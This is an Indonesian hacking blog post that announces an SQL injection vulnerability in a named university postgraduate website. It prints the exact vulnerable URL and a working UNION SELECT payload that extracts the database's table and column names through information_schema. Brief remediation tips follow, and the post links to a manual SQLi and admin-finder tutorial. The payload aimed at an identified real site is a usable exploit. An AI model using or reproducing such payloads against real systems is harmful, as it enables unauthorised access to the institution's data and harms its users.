MAGELANG1337.COM

Search

Situs Pascasarjana Undiknas Mempunyai Kerentanan SQL INJECTION


SQL Injection adalah teknik hacking untuk memanipulasi query ( perintah database). injeksi sering di lakukan melalui inputan inputan yang tidak di lakukan pengecekan kebenaran data yang di input. untuk lebih jelasnya saya berikan contoh program dan query yang di injeksi.

untuk mengecek vuln atau tidak biasanya attacker menambahkan ‘ (kutip 1) jika keluar error maka  website tersebut vuln. apa sih yang sebenarnya terjadi kok di tambahin ‘ (kutip) aja langsung error?.
Pada website Pascasarjana Undiknas ini bisa kita kerentanan di alamat http://www.pasca-undiknas.ac.id/ful_pagz.php?data=detail_dosen&id=71%27
pada dasarnya method GET[id] diatas di gunakan untuk mencari data di dalam database. Contoh :
http://www.pasca-undiknas.ac.id/ful_pagz.php?data=detail_dosen&id=-71%27+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+

Mengamankan Dari Serangan SQL Injection

ada beberapa cara yang bisa kita lakukan untuk mengatasi serangan SQL injection , kita bisa membuat script anti SQL injection dengan memanfaatkan fungsi bawan dari PHP yaitu mysql_real_escape atau mysql_real_escape_string. cara penggunaanya adalah sebagai berikut :

Default

$id = mysql_real_escape_string($_GET['id']);
1
$id = mysql_real_escape_string($_GET['id']);
selain cara di atas, ada beberapa tips aplikatif yang bisa anda gunakan untuk mengamankan web anda dari serangan SQL injection, berikut ini tips nya :

1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5. Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.

Untuk Belajar SQLI manuak cek disini Tutorial SQLi Manual + Admin Finder

Comments
0 Comments